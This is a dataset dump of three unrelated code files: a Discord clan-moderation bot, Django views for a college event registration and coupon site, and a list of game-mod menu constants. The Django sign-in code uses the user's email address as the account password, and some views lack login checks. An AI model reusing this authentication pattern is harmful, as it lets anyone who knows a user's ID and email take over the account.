message.author.bot:\n return\n membro = '<@&321015529059909674>'\n convidado = '<@&321015669883797506>'\n if membro in message.author.roles or convidado in message.author.roles or True:\n if membro in message.content or convidado in message.content or '@everyone' in message.content or '@here' in message.content:\n embed = discord.Embed(\n title=\"__Quebra de Conduta__\",\n description=separator,\n color=discord.Color.dark_red(),\n )\n embed.add_field(\n name=f\"Por favor não utilize as seguintes menções sem permissão para tal:\",\n value=f\"{membro} - {convidado} - @everyone - @here\",\n inline=False\n )\n embed.set_author(\n name=\"Administração\",\n icon_url=\"http://www.runeclan.com/images/ranks/1.png\"\n )\n embed.set_thumbnail(\n url=f\"http://services.runescape.com/m=avatar-rs/{setting.CLAN_NAME}/clanmotif.png?cachebust=1541099511258\"\n )\n embed.set_footer(\n text=\"Nosso servidor abriga uma quantidade muito grande de pessoas, tenha bom senso ao utilizar uma menção que irá notificar centenas de pessoas.\"\n )\n\n print(f'> {message.author} used a not allowed mention in channel #{message.channel} at {datetime.datetime.now()}')\n print(f\"Content:\\n<\\n{message.content}\\n>\")\n await message.delete()\n return await message.channel.send(content=message.author.mention, embed=embed)\n\n # Replace old Rs Wikia links to the new Rs Wiki links\n if 'http' in message.content and 'runescape.wikia.com/wiki/' in message.content:\n urls = re.findall(r\"http\\S+\", message.content)\n formatted_urls = []\n for url in urls:\n if 'runescape.wikia.com/wiki/' in url:\n url = url.replace('runescape.wikia.com/wiki/', 'runescape.wiki/w/')\n formatted_urls.append(url)\n\n formatted_urls_string = ''\n for url in formatted_urls:\n formatted_urls_string += f'- ***<{url}>***\\n\\n'\n plural = ''\n if len(formatted_urls) > 1:\n plural = 's'\n await message.channel.send(f'Olá, parece que você usou um ou mais links para a antiga Wiki do RuneScape!'\n f'\\n\\n'\n f'Recentemente os Admins da Wiki, com ajuda da Jagex, '\n f'passou a hostear a wiki do jogo no site oficial do RuneScape, ao '\n f'invés do{plural} link{plural} que você enviou, utilize o{plural} link{plural} abaixo:\\n\\n'\n f'{formatted_urls_string}'\n f'Ajude-nos a fazer a nova wiki ser conhecida por todos :)')\n # If in development environment only accept answers from myself\n await self.process_commands(message)\n\n async def on_message_edit(self, before, after):\n if after.author.bot:\n return\n await self.process_commands(after)\n\n\nif __name__ == '__main__':\n logger = logging.getLogger('discord')\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\n handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\n logger.addHandler(handler)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run())\n","sub_path":"rs3clansbot.py","file_name":"rs3clansbot.py","file_ext":"py","file_size_in_byte":14247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"364568231","text":"from django.shortcuts import render,HttpResponse,get_object_or_404\nfrom django.contrib import admin,auth\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.shortcuts import redirect\n#from .forms import ProfileForm\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.dispatch import receiver\nfrom django.contrib.auth import login,authenticate\nfrom app.models import UserProfile,Event,UserToken,Registration,EventRules,RegistrationManagement,RatingModel,UserRated\nimport random\nfrom django.http import JsonResponse\nimport itertools\n\n# Create your views here.\ndef home(request):\n eventa=Event.objects.all()\n events=[]\n single=['marketing_roadies','buffet_money','placement_fever']\n eee=['Sherlocked','Pubg','Roadies','Treasure Hunt','Auction Villa','Cs Go','Placement Fever','Lazer Maze','Robo Soccer','Bull Stock 2.0','Codee','Technovation','Aaviskar','Guest Lecture']\n rankers=UserProfile.objects.order_by('-coins')[:20]\n ranks=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\n rankersprofile=[]\n for i in rankers:\n rankersprofile.append(i)\n for ev in eventa:\n events.append(ev.name)\n print(ev.eventrules.about)\n\n if request.user.is_authenticated:\n rl=[]\n events=[]\n try:\n e=UserProfile.objects.filter(user=request.user).count()\n except UserProfile.DoesNotExist:\n UserProfile.objects.create(user=request.user)\n u=UserProfile.objects.get(user=request.user)\n try:\n f=UserRated.objects.filter(user=request.user).count()\n print(e)\n except UserRated.DoesNotExist:\n UserRated.objects.create(user=request.user)\n try:\n g=UserToken.objects.filter(user=request.user).count()\n except UserToken.DoesNotExist:\n UserToken.objects.create(user=request.user)\n if e==0:\n UserProfile.objects.create(user=request.user)\n if f==0:\n UserRated.objects.create(user=request.user)\n if g==0:\n UserToken.objects.create(user=request.user)\n t=UserToken.objects.get(user=request.user)\n tt=UserRated.objects.get(user=request.user)\n tokens=[]\n tokens.append(t.sherlocked),events.append('sherlocked'),tokens.append(t.pubg),events.append('pubg'),tokens.append(t.marketing_roadies),events.append('marketing_roadies'),tokens.append(t.treasure_hunt),events.append('treasure_hunt'),tokens.append(t.auction_villa),events.append('auction_villa'),tokens.append(t.cs_go),events.append('cs_go'),tokens.append(t.placement_fever),events.append('placement_fever')\n tokens.append(t.lazer_maze),events.append('lazer_maze'),tokens.append(t.robo_soccer),events.append('robo_soccer'),tokens.append(t.buffet_money),events.append('buffet_money'),tokens.append(t.codee),events.append('codee'),tokens.append(t.technovation),events.append('technovation'),tokens.append(t.aaviskar),events.append('aaviskar'),tokens.append(t.guest_lecture),events.append('guest_lecture')\n rl.append(tt.sherlocked),rl.append(tt.pubg),rl.append(tt.marketing_roadies),rl.append(tt.treasure_hunt),rl.append(tt.auction_villa),rl.append(tt.cs_go),rl.append(tt.placement_fever)\n rl.append(tt.lazer_maze),rl.append(tt.robo_soccer),rl.append(tt.buffet_money),rl.append(tt.codee),rl.append(tt.technovation),rl.append(tt.aaviskar),rl.append(tt.guest_lecture)\n #print(tokens)\n #print(events)\n coin=u.coins\n rp=UserProfile.objects.order_by('-coins')\n ru=0\n for x in rp:\n ru=ru+1\n if x.admission==request.user.userprofile.admission:\n break\n mylist=zip(events,tokens,eventa,rl,eee)\n rppp=zip(rankersprofile,ranks)\n args={'coin':coin,'mylist':mylist,'single':single,'eventa':eventa,'ru':ru,'rppp':rppp}\n return render(request,'myapp/events.html',args)\n tokens=[5,5,5,5,5,5,5,5,5,5,5,5,5,5]\n rl=[5,5,5,5,5,5,5,5,5,5,5,5,5,5]\n mylist=zip(events,tokens,eventa,rl,eee)\n rppp=zip(rankersprofile,ranks)\n args={'mylist':mylist,'single':single,'eventa':eventa,'rppp':rppp}\n return render(request,'myapp/events.html',args)\n\ndef register(request):\n if request.method == 'POST':\n print('process initiated')\n name=request.POST.get('id_name')\n username=request.POST.get('id_username')\n imageurl=request.POST.get('imageaurl')\n branch=request.POST.get('id_branch')\n email=request.POST.get('id_email')\n phone=request.POST.get('id_phone')\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n y.phone=phone\n y.branch=branch\n y.email=email\n y.admission=username\n y.imageurl=imageurl\n y.save()\n print(name,email,imageurl)\n return HttpResponse('Success')\n@login_required\ndef profile(request):\n user=request.user\n p=UserProfile.objects.get(user=user)\n args={'p':p}\n if request.method==\"POST\":\n name=request.POST.get('id_name')\n username=request.POST.get('id_admission')\n #imageurl=request.POST.get('imageaurl')\n branch=request.POST.get('id_branch')\n phone=request.POST.get('id_phone')\n print(name,username,phone,branch)\n print('saving data')\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n y.phone=phone\n y.branch=branch\n y.admission=username\n #y.imageurl=imageurl\n y.save()\n return redirect('/web/')\n return render(request,'myapp/profile.html',args)\n\ndef loginu(request):\n username=request.POST.get('username')\n password=request.POST.get('id_password')\n\n print('initiated')\n user=authenticate(username=username,password=password)\n if user is None:\n return HttpResponse('Wrong')\n print(user)\n login(request,user)\n return HttpResponse('Success')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/web/')\n\ndef eventregister(request):\n team_name=request.POST.get('team_name')\n team_name=str(team_name)\n ad=request.POST.get('adm')\n event=request.POST.get('event')\n event=str(event)\n print(ad,team_name,event)\n print(event)\n if team_name == \"\":\n return HttpResponse('null')\n\n try:\n e=RegistrationManagement.objects.get(team_name=team_name,current_event=event).members.count()\n except RegistrationManagement.DoesNotExist:\n e=None\n print(e)\n #return Response({'message':'Testing passed'})\n if ad == 'none':\n try:\n e=RegistrationManagement.objects.get(team_name=team_name,current_event=event).members.count()\n except RegistrationManagement.DoesNotExist:\n e=None\n if e is None:\n return HttpResponse('Registration has been been closed')\n y=UserProfile.objects.get(user=request.user)\n RegistrationManagement.create_team(event,team_name,request.user,y.admission,y.phone,event)\n else:\n return HttpResponse('Already')\n elif team_name!='none' :\n #RegistrationManagement.join_team(request.user,team_name)\n if e is None:\n return HttpResponse('Registration has been been closed')\n #return HttpResponse('ncreated')\n elif e<5:\n RegistrationManagement.join_team(event,team_name,request.user)\n else :\n return HttpResponse('Full')\n elif team_name=='none':\n return HttpResponse('Registration has been been closed')\n\n x=random.randint(999,99999)*67\n events=Event.objects.all()\n regi=UserToken.objects.get(user=request.user)\n event=str(event)\n if event=='aaviskar':\n regi.aaviskar=x\n if event=='technovation':\n regi.technovation=x\n if event=='codee':\n regi.codee=x\n if event=='pubg':\n regi.pubg=x\n if event=='sherlocked':\n regi.sherlocked=x\n if event=='marketing_roadies':\n regi.marketing_roadies=x\n if event=='treasure_hunt':\n regi.treasure_hunt=x\n if event=='auction_villa':\n regi.auction_villa=x\n if event=='cs_go':\n regi.cs_go=x\n if event=='placement_fever':\n regi.placement_fever=x\n if event=='laser_maze':\n regi.lazer_maze=x\n if event=='robo_soccer':\n regi.robo_soccer=x\n if event=='buffet_money':\n regi.buffet_money=x\n if event=='guest_lecture':\n regi.guest_lecture=x\n\n regi.save()\n adm=UserProfile.objects.get(user=request.user)\n Registration.objects.create(event=event,team_name=team_name,admission=adm,token=x)\n return HttpResponse('Success')\n\ndef verify(request):\n event=request.POST.get('event')\n coupon=request.POST.get('coupon')\n print(coupon,event,request.user)\n if event=='pubg':\n x=request.user.usertoken.pubg\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.pubg='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='sherlocked':\n x=request.user.usertoken.sherlocked\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.sherlocked='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='marketing_roadies':\n x=request.user.usertoken.marketing_roadies\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.marketing_roadies='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='treasure_hunt':\n x=request.user.usertoken.treasure_hunt\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.treasure_hunt='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='auction_villa':\n x=request.user.usertoken.auction_villa\n print(coupon)\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.auction_villa='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='cs_go':\n x=request.user.usertoken.cs_go\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.cs_go='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='placement_fever':\n x=request.user.usertoken.placement_fever\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.placement_fever='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='laser_maze':\n x=request.user.usertoken.lazer_maze\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.lazer_maze='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='robo_soccer':\n x=request.user.usertoken.robo_soccer\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.robo_soccer='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='buffet_money':\n x=request.user.usertoken.buffet_money\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.buffet_money='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='codee':\n x=request.user.usertoken.codee\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.codee='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n if event=='technovation':\n x=request.user.usertoken.technovation\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.technovation='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='aaviskar':\n x=request.user.usertoken.aaviskar\n print(x)\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.aaviskar='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n elif event=='guest_lecture':\n x=request.user.usertoken.guest_lecture\n if str(x) == str(coupon):\n y=UserProfile.objects.get(user=request.user)\n z=y.coins\n y.coins=z+100\n y.save()\n t=UserToken.objects.get(user=request.user)\n t.guest_lecture='1'\n t.save()\n return HttpResponse('Success')\n else:\n return HttpResponse('Wrong')\n\n else :\n HttpResponse('Invalid event')\n\ndef rating(request):\n event=request.POST.get('event')\n rvalue=request.POST.get('rvalue')\n rvalue=int(rvalue)\n print(rvalue,event)\n try:\n e=RatingModel.objects.get(event=event)\n except RatingModel.DoesNotExist:\n e=None\n RatingModel.objects.create(event=event)\n t=RatingModel.objects.get(event=event)\n x=float(t.average_rating)\n y=int(t.number_of_rates)\n x=str((x*y+rvalue)/(y+1))\n y=str(y+1)\n t.average_rating=x\n t.number_of_rates=y\n t.save()\n try:\n e=UserRated.objects.get(user=request.user)\n except RatingModel.DoesNotExist:\n e=None\n UserRated.objects.create(user=request.user)\n regi=UserRated.objects.get(user=request.user)\n x=str(rvalue)\n if event=='aaviskar':\n regi.aaviskar=x\n if event=='technovation':\n regi.technovation=x\n if event=='codee':\n regi.codee=x\n if event=='pubg':\n regi.pubg=x\n if event=='sherlocked':\n regi.sherlocked=x\n if event=='marketing_roadies':\n regi.marketing_roadies=x\n if event=='treasure_hunt':\n regi.treasure_hunt=x\n if event=='auction_villa':\n regi.auction_villa=x\n if event=='cs_go':\n regi.cs_go=x\n if event=='placement_fever':\n regi.placement_fever=x\n if event=='laser_maze':\n regi.lazer_maze=x\n if event=='robo_soccer':\n regi.robo_soccer=x\n if event=='buffet_money':\n regi.buffet_money=x\n if event=='guest_lecture':\n regi.guest_lecture=x\n regi.save()\n\n return HttpResponse('Success')\n\ndef googleSignin(request):\n print('googlesignin iniated')\n name=request.POST.get('name')\n ids=request.POST.get('id')\n imageurl=request.POST.get('imageurl')\n email=request.POST.get('email')\n print(ids,name,imageurl,email)\n user=authenticate(username=ids,password=email)\n if user is None:\n user = User.objects.create_user(username=ids, password=email, email=email)\n user.save()\n login(request,user)\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n #y.phone=phone\n #y.branch=branch\n y.email=email\n #y.admission=username\n y.imageurl=imageurl\n y.save()\n return HttpResponse('Registered')\n else:\n print(user)\n login(request,user)\n yy=UserProfile.objects.filter(user=request.user).count()\n if yy==0:\n UserProfile.objects.create(user=request.user)\n y=UserProfile.objects.get(user=request.user)\n y.name=name\n #y.phone=phone\n #y.branch=branch\n y.email=email\n #y.admission=username\n y.imageurl=imageurl\n y.save()\n return HttpResponse('Success')\n\n","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"301112351","text":"menu_start_game_options = 0\nmenu_start_phase_2 = 1\nmenu_start_game_3 = 2\nmenu_tutorial = 3\nmenu_reports = 4\nmenu_custom_battle_scene = 5\nmenu_custom_battle_end = 6\nmenu_start_game_0 = 7\nmenu_start_game_1 = 8\nmenu_start_character_1 = 9\nmenu_start_character_2 = 10\nmenu_start_character_3 = 11\nmenu_start_character_4 = 12\nmenu_choose_skill = 13\nmenu_banner_selection_for_noble = 14\nmenu_past_life_explanation = 15\nmenu_auto_return = 16\nmenu_morale_report = 17\nmenu_courtship_relations = 18\nmenu_lord_relations = 19\nmenu_companion_report = 20\nmenu_faction_orders = 21\nmenu_character_report = 22\nmenu_party_size_report = 23\nmenu_player_class = 24\nmenu_faction_relations_report = 25\nmenu_other_relations_report = 26\nmenu_camp = 27\nmenu_camp_special_ability = 28\nmenu_camp_special_ability_extra = 29\nmenu_camp_special_ability_passive = 30\nmenu_inspect_camp = 31\nmenu_camp_cheat = 32\nmenu_camp_cheat_2 = 33\nmenu_cheat_find_item = 34\nmenu_cheat_find_item_2 = 35\nmenu_camp_action = 36\nmenu_export_import_npcs = 37\nmenu_export_import_npcs_2 = 38\nmenu_camp_recruit_prisoners = 39\nmenu_camp_no_prisoners = 40\nmenu_camp_action_read_book = 41\nmenu_camp_action_read_book_start = 42\nmenu_retirement_verify = 43\nmenu_end_game = 44\nmenu_cattle_herd = 45\nmenu_cattle_herd_kill = 46\nmenu_cattle_herd_kill_end = 47\nmenu_arena_duel_fight = 48\nmenu_arena_duel_conclusion = 49\nmenu_simple_encounter = 50\nmenu_encounter_retreat_confirm = 51\nmenu_encounter_retreat = 52\nmenu_order_attack_begin = 53\nmenu_order_attack_2 = 54\nmenu_battle_debrief = 55\nmenu_freelancer_escape = 56\nmenu_total_victory = 57\nmenu_enemy_slipped_away = 58\nmenu_total_defeat = 59\nmenu_permanent_damage = 60\nmenu_pre_join = 61\nmenu_join_battle = 62\nmenu_join_order_attack = 63\nmenu_zendar = 64\nmenu_salt_mine = 65\nmenu_four_ways_inn = 66\nmenu_test_scene = 67\nmenu_battlefields = 68\nmenu_dhorak_keep = 69\nmenu_join_siege_outside = 70\nmenu_cut_siege_without_fight = 71\nmenu_besiegers_camp_with_allies = 72\nmenu_castle_outside = 73\nmenu_castle_guard = 74\nmenu_castle_entry_granted = 75\nmenu_castle_entry_denied = 76\nmenu_castle_meeting = 77\nmenu_castle_meeting_selected = 78\nmenu_castle_entry_refused = 79\nmenu_castle_entry_refused_accepted = 80\nmenu_castle_besiege = 81\nmenu_siege_attack_meets_sally = 82\nmenu_castle_besiege_inner_battle = 83\nmenu_construct_ladders = 84\nmenu_construct_siege_tower = 85\nmenu_castle_attack_walls_simulate = 86\nmenu_castle_attack_walls_with_allies_simulate = 87\nmenu_castle_taken_by_friends = 88\nmenu_castle_taken = 89\nmenu_castle_taken_2 = 90\nmenu_requested_castle_granted_to_player = 91\nmenu_requested_castle_granted_to_player_husband = 92\nmenu_requested_castle_granted_to_another = 93\nmenu_requested_castle_granted_to_another_female = 94\nmenu_leave_faction_2 = 95\nmenu_leave_faction = 96\nmenu_give_center_to_player = 97\nmenu_give_center_to_player_2 = 98\nmenu_oath_fulfilled = 99\nmenu_siege_started_defender = 100\nmenu_siege_join_defense = 101\nmenu_enter_your_own_castle = 102\nmenu_village = 103\nmenu_village_supplies = 104\nmenu_village_hostile_action = 105\nmenu_recruit_volunteers = 106\nmenu_town_recruit_volunteers = 107\nmenu_regular_recruit = 108\nmenu_center_build_order = 109\nmenu_village_hunt_down_fugitive_defeated = 110\nmenu_village_infest_bandits_result = 111\nmenu_village_infestation_removed = 112\nmenu_center_manage_advance = 113\nmenu_center_improve_advance = 114\nmenu_center_manage = 115\nmenu_center_improve = 116\nmenu_town_bandits_failed = 117\nmenu_town_bandits_succeeded = 118\nmenu_town_bandits_succeeded2 = 119\nmenu_town_bandits_succeeded3 = 120\nmenu_credit_fight_failed = 121\nmenu_credit_fight_succeeded = 122\nmenu_village_steal_cattle_confirm = 123\nmenu_village_steal_cattle = 124\nmenu_village_take_food_confirm = 125\nmenu_village_take_food = 126\nmenu_village_start_attack = 127\nmenu_village_loot_no_resist = 128\nmenu_village_loot_complete = 129\nmenu_village_loot_defeat = 130\nmenu_village_loot_continue = 131\nmenu_close = 132\nmenu_town = 133\nmenu_go_to_settlements = 134\nmenu_go_somewhere = 135\nmenu_trophy_trade_2 = 136\nmenu_enter_blacksmith = 137\nmenu_cannot_enter_blacksmith = 138\nmenu_cannot_enter_blacksmith_low = 139\nmenu_cannot_enter_court = 140\nmenu_lady_visit = 141\nmenu_town_tournament_start_new = 142\nmenu_town_tournament_lost = 143\nmenu_town_tournament_won = 144\nmenu_town_tournament_won_by_another = 145\nmenu_town_tournament = 146\nmenu_tournament_withdraw_verify = 147\nmenu_tournament_bet = 148\nmenu_tournament_bet_confirm = 149\nmenu_tournament_participants = 150\nmenu_collect_taxes = 151\nmenu_collect_taxes_complete = 152\nmenu_collect_taxes_rebels_killed = 153\nmenu_collect_taxes_failed = 154\nmenu_collect_taxes_revolt_warning = 155\nmenu_collect_taxes_revolt = 156\nmenu_train_peasants_against_bandits = 157\nmenu_train_peasants_against_bandits_ready = 158\nmenu_train_peasants_against_bandits_training_result = 159\nmenu_train_peasants_against_bandits_attack = 160\nmenu_train_peasants_against_bandits_attack_result = 161\nmenu_train_peasants_against_bandits_success = 162\nmenu_disembark = 163\nmenu_ship_reembark = 164\nmenu_center_reports = 165\nmenu_price_and_production = 166\nmenu_town_trade = 167\nmenu_town_trade_assessment_begin = 168\nmenu_town_trade_assessment = 169\nmenu_sneak_into_town_suceeded = 170\nmenu_sneak_into_town_caught = 171\nmenu_sneak_into_town_caught_dispersed_guards = 172\nmenu_sneak_into_town_caught_ran_away = 173\nmenu_enemy_offer_ransom_for_prisoner = 174\nmenu_training_ground = 175\nmenu_training_ground_selection_details_melee_1 = 176\nmenu_training_ground_selection_details_melee_2 = 177\nmenu_training_ground_selection_details_mounted = 178\nmenu_training_ground_selection_details_ranged_1 = 179\nmenu_training_ground_selection_details_ranged_2 = 180\nmenu_training_ground_description = 181\nmenu_training_ground_training_result = 182\nmenu_marshall_selection_candidate_ask = 183\nmenu_captivity_avoid_wilderness = 184\nmenu_captivity_start_wilderness = 185\nmenu_captivity_start_wilderness_surrender = 186\nmenu_captivity_start_wilderness_defeat = 187\nmenu_captivity_start_castle_surrender = 188\nmenu_captivity_start_castle_defeat = 189\nmenu_captivity_start_under_siege_defeat = 190\nmenu_captivity_wilderness_taken_prisoner = 191\nmenu_captivity_wilderness_check = 192\nmenu_captivity_end_wilderness_escape = 193\nmenu_captivity_castle_taken_prisoner = 194\nmenu_captivity_rescue_lord_taken_prisoner = 195\nmenu_captivity_castle_check = 196\nmenu_captivity_end_exchanged_with_prisoner = 197\nmenu_captivity_end_propose_ransom = 198\nmenu_captivity_castle_remain = 199\nmenu_kingdom_army_quest_report_to_army = 200\nmenu_kingdom_army_quest_messenger = 201\nmenu_kingdom_army_quest_join_siege_order = 202\nmenu_kingdom_army_follow_failed = 203\nmenu_invite_player_to_faction_without_center = 204\nmenu_invite_player_to_faction = 205\nmenu_invite_player_to_faction_accepted = 206\nmenu_question_peace_offer = 207\nmenu_notification_truce_expired = 208\nmenu_notification_feast_quest_expired = 209\nmenu_notification_sortie_possible = 210\nmenu_notification_casus_belli_expired = 211\nmenu_notification_lord_defects = 212\nmenu_notification_treason_indictment = 213\nmenu_notification_border_incident = 214\nmenu_notification_player_faction_active = 215\nmenu_minister_confirm = 216\nmenu_notification_court_lost = 217\nmenu_notification_player_faction_deactive = 218\nmenu_notification_player_wedding_day = 219\nmenu_notification_player_kingdom_holds_feast = 220\nmenu_notification_center_under_siege = 221\nmenu_notification_center_under_siege_special = 222\nmenu_notification_village_raided = 223\nmenu_notification_village_raid_started = 224\nmenu_notification_one_faction_left = 225\nmenu_notification_oath_renounced_faction_defeated = 226\nmenu_notification_center_lost = 227\nmenu_notification_center_sacked = 228\nmenu_notification_troop_left_players_faction = 229\nmenu_notification_troop_joined_players_faction = 230\nmenu_notification_war_declared = 231\nmenu_notification_peace_declared = 232\nmenu_notification_faction_defeated = 233\nmenu_notification_kingdom_restoration = 234\nmenu_notification_rebels_switched_to_faction = 235\nmenu_notification_player_should_consult = 236\nmenu_notification_player_feast_in_progress = 237\nmenu_notification_lady_requests_visit = 238\nmenu_garden = 239\nmenu_kill_local_merchant_begin = 240\nmenu_debug_alert_from_s65 = 241\nmenu_auto_return_to_map = 242\nmenu_bandit_lair = 243\nmenu_notification_player_faction_political_issue_resolved = 244\nmenu_notification_player_faction_political_issue_resolved_for_player = 245\nmenu_start_phase_2_5 = 246\nmenu_start_king = 247\nmenu_start_knight = 248\nmenu_start_phase_3 = 249\nmenu_start_phase_4 = 250\nmenu_lost_tavern_duel = 251\nmenu_establish_court = 252\nmenu_notification_relieved_as_marshal = 253\nmenu_manage_loot_pool = 254\nmenu_auto_loot = 255\nmenu_auto_loot_item_pools = 256\nmenu_donate = 257\nmenu_blacksmith = 258\nmenu_blacksmith_item_high = 259\nmenu_blacksmith2 = 260\nmenu_blacksmith_item_low = 261\nmenu_blacksmith2_low = 262\nmenu_dplmc_notification_alliance_declared = 263\nmenu_dplmc_notification_defensive_declared = 264\nmenu_dplmc_notification_trade_declared = 265\nmenu_dplmc_notification_nonaggression_declared = 266\nmenu_dplmc_question_alliance_offer = 267\nmenu_dplmc_question_defensive_offer = 268\nmenu_dplmc_question_trade_offer = 269\nmenu_dplmc_question_nonaggression_offer = 270\nmenu_dplmc_notification_alliance_expired = 271\nmenu_dplmc_notification_defensive_expired = 272\nmenu_dplmc_notification_trade_expired = 273\nmenu_dplmc_dictate_terms = 274\nmenu_dplmc_deny_terms = 275\nmenu_dplmc_village_riot_result = 276\nmenu_dplmc_village_riot_removed = 277\nmenu_dplmc_town_riot_removed = 278\nmenu_dplmc_riot_negotiate = 279\nmenu_dplmc_notification_riot = 280\nmenu_dplmc_notification_appoint_chamberlain = 281\nmenu_dplmc_chamberlain_confirm = 282\nmenu_dplmc_notification_appoint_constable = 283\nmenu_dplmc_constable_confirm = 284\nmenu_dplmc_notification_appoint_chancellor = 285\nmenu_dplmc_chancellor_confirm = 286\nmenu_dplmc_deserters = 287\nmenu_dplmc_negotiate_besieger = 288\nmenu_dplmc_messenger = 289\nmenu_dplmc_scout = 290\nmenu_dplmc_domestic_policy = 291\nmenu_dplmc_affiliate_end = 292\nmenu_choose_options_1 = 293\nmenu_choose_options_2 = 294\nmenu_choose_options_3 = 295\nmenu_choose_options_end = 296\nmenu_game_mode = 297\nmenu_town_menu_cheats = 298\nmenu_bank = 299\nmenu_borrow_money = 300\nmenu_banks_report = 301\nmenu_new_kingdom_restoration = 302\nmenu_intrusion_alarm = 303\nmenu_world_map_soldier = 304\nmenu_meet_the_doctor = 305\nmenu_commander_aud = 306\nmenu_ask_revolt = 307\nmenu_revolt = 308\nmenu_ask_desert = 309\nmenu_desert = 310\nmenu_ask_retire = 311\nmenu_freelance_camp = 312\nmenu_trophy_trade = 313\nmenu_contribution_trophy = 314\nmenu_upgrade_path = 315\nmenu_upgrade_path_knight = 316\nmenu_freelancer_train_player_1 = 317\nmenu_freelancer_train_player_2 = 318\nmenu_freelancer_train_player_win = 319\nmenu_freelancer_train_player_lose = 320\nmenu_oim_rich_visitor = 321\nmenu_oim_rich_visitor_result = 322\nmenu_oim_rich_visitor_meal = 323\nmenu_world_map_precision = 324\nmenu_battlefield_size = 325\nmenu_necromancy = 326\nmenu_necro_create_undead_weak = 327\nmenu_necro_create_undead = 328\nmenu_necro_create_item = 329\nmenu_necro_create_troop = 330\nmenu_necro_sg = 331\nmenu_camp_manage_gems = 332\nmenu_next_rank_notify = 333\nmenu_camp_set_special_ability = 334\nmenu_camp_manage_item = 335\nmenu_adventure_object = 336\nmenu_adventure_object_1 = 337\nmenu_camp_hunting_or_poaching = 338\nmenu_poaching = 339\nmenu_hunting = 340\nmenu_hunting_2 = 341\nmenu_after_hunt = 342\nmenu_choose_scenes_0 = 343\nmenu_choose_scenes_13 = 344\nmenu_choose_scenes_26 = 345\nmenu_choose_scenes_39 = 346\nmenu_choose_scenes_52 = 347\nmenu_choose_scenes_65 = 348\nmenu_choose_scenes_78 = 349\nmenu_choose_scenes_91 = 350\nmenu_choose_scenes_104 = 351\nmenu_choose_scenes_117 = 352\nmenu_choose_scenes_130 = 353\nmenu_choose_scenes_143 = 354\nmenu_choose_scenes_156 = 355\nmenu_choose_scenes_169 = 356\nmenu_choose_scenes_182 = 357\nmenu_choose_scenes_195 = 358\nmenu_choose_scenes_208 = 359\nmenu_choose_scenes_221 = 360\nmenu_choose_scenes_234 = 361\nmenu_choose_scenes_247 = 